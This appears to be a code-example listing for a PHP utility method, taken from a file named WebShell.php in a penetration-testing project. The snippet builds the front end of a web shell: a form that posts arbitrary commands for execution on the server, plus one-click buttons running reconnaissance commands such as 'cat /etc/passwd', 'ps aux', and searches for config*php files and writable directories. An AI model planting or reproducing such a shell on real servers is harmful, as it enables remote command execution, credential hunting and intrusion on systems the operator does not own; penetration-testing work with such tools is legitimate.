PHP Util::dirBack Examples

dirBack() public method

public dirBack ( $str )

Example #1

File: WebShell.php Project: alpha1e0/pentestdb

    function main($run)
    {
        $util = new Util();
        $body = '
           <div class="container-fluid" style="margin:60px;">
               <div class="row-fluid">
                   <div class="span3">
                       <div class="well sidebar-nav" style="overflow-x:auto;">
                           <ul class="nav nav-list">
                               <li class="nav-header">PHP Tools</li>
                               <li><a href="#" onclick="doFormPost(\'php\',\'execute\',\'uname -a\');">uname -a</a></li>
                               <li><a href="#" onclick="doFormPost(\'php\',\'execute\',\'ps aux\');">ps aux</a></li>
                               <li><a href="#" onclick="doFormPost(\'php\',\'execute\',\'cat /etc/passwd\');">cat /etc/passwd</a></li>
                               <li><a href="#" onclick="doFormPost(\'php\',\'execute\',\'df -h\');">df -h</a></li>
                               <li><a href="#" onclick="doFormPost(\'php\',\'execute\',\'mount\');">mount</a></li>
                               <li><a href="#" onclick="doFormPost(\'php\',\'execute\',\'find ' . $util->dirBack($_SERVER['PHP_SELF']) . ' -type f -name config*php\');">find ' . $util->dirBack($_SERVER['PHP_SELF']) . ' -type f -name config*php</a></li>
                               <li><a href="#" onclick="doFormPost(\'php\',\'execute\',\'find ' . $util->dirBack($_SERVER['PHP_SELF']) . ' -type d -writable\');">find ' . $util->dirBack($_SERVER['PHP_SELF']) . ' -type d -writable</a></li>
                               <li><a href="#" onclick="doFormPost(\'php\',\'execute\',\'find ' . $util->dirBack($_SERVER['PHP_SELF']) . ' -type f -writable\');">find ' . $util->dirBack($_SERVER['PHP_SELF']) . ' -type f -writable</a></li>
                           </ul>
                       </div>
                   </div>
                   <div class="span9">
                       <div class="well">
                           <h2>Php Execute </h2>
                           <form class="well" method="POST">
                               <textarea name="item" style="width:100%; height:100px;" class="input-xlarge">';
        if ($_POST['method'] == 'execute') {
            $body .= htmlentities($_POST['item'], ENT_QUOTES);
        }
        $body .= '</textarea>
                               <input type="hidden" name="cmd" value="php">
                               <input type="hidden" name="method" value="execute">
                               <p style="text-align: right;"><button type="submit" class="btn btn-success">Run &raquo;</button></p>
 
                           </form>
                           <h2>Response</h2>
                           <div class="well" style="height: 300px; overflow-x:auto; overflow-y:auto;">
                               <pre>';
        if (is_array($run)) {
            foreach ($run as $row) {
                $body .= $row . "<br>";
            }
        }
        $body .= '</pre>
                           </div>
                       </div>
                   </div>
               </div>
           </div>
       ';
        return $body;
    }